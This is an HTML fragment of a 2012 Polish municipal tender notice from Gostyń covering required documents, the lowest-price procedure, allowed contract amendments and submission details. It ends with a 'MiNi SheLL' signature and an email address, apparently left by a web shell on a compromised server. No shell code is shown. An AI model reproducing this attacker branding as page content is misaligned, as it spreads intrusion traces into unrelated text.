III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty należy dołączyć ponadto: pełnomocnictwo do reprezentowania firmy, jeśli dotyczy, a nie wynika ono z innych przedstawionych dokumentów, dowód wniesienia wadium, harmonogram rzeczowo-finansowy, wykaz wyposażenia placów zabaw w urządzenia wraz z wyceną, kosztorysy ofertowe - kosztorysy nie będą podlegały weryfikacji przez Zamawiającego, będą służyły jako materiał pomocniczy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiany umowy dopuszczone są w granicach unormowania art. 144 ustawy Prawo zamówień publicznych, w niżej wymienionych przypadkach:
1)	zmiany danych adresowych stron, ich rachunków bankowych bądź zmiany osób wymienionych przez strony do realizacji umowy,
2)	zmiany formy prawnej prowadzenia działalności gospodarczej przez Wykonawcę,
3)	zmiany terminu wykonania zadania w przypadku wystąpienia nieprzewidzianych okoliczności, na które wykonawca nie ma wpływu (m. in. wystąpienie kolizji, konieczność wykonania robót dodatkowych, warunków atmosferycznych uniemożliwiających prowadzenie przedmiotowych prac),
4)	zmiany podmiotu trzeciego / podwykonawcy na etapie realizacji zamówienia,
5)	zmianie kolejności terminów wykonania poszczególnych etapów robót określonych, płatności w harmonogramie rzeczowo-finansowym bez zmiany terminu końcowego realizacji zadania,
6)	konieczności wprowadzenia robót zamiennych w zależności od specyfiki zamówienia,
7)	zmiany ustawowej stawki podatku VAT.
2.	Zmiany, o których mowa w ust.1, pkt 5, mogą być dokonane po uprzedniej akceptacji Zamawiającego.
3.	Zmiany umowy mogą być dokonywane na wniosek Zamawiającego lub Wykonawcy 
i wymagają akceptacji przez obie strony umowy.
4.	Strona inicjująca zmianę uzasadnia potrzebę wprowadzenia zmian i określa jej wpływ na harmonogram robót.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gostyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ (nieodpłatnie) można odebrać w Urzedzie Miejskim, ul. Wrocławska 256, pok. nr 6, otrzymać za zaliczeniem pocztowym lub pobrać ze strony internetowej www.bip.gostyn.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.07.2012 godzina 12:00, miejsce: Pisemne oferty należy składać lub przesłać na adres: Urząd Miejski 
w Gostyniu, Rynek 2, pok. nr 10 (sekretariat) lub składać w Wydziale Rozwoju 
i Inwestycji, ul. Wrocławska 256, pok. nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com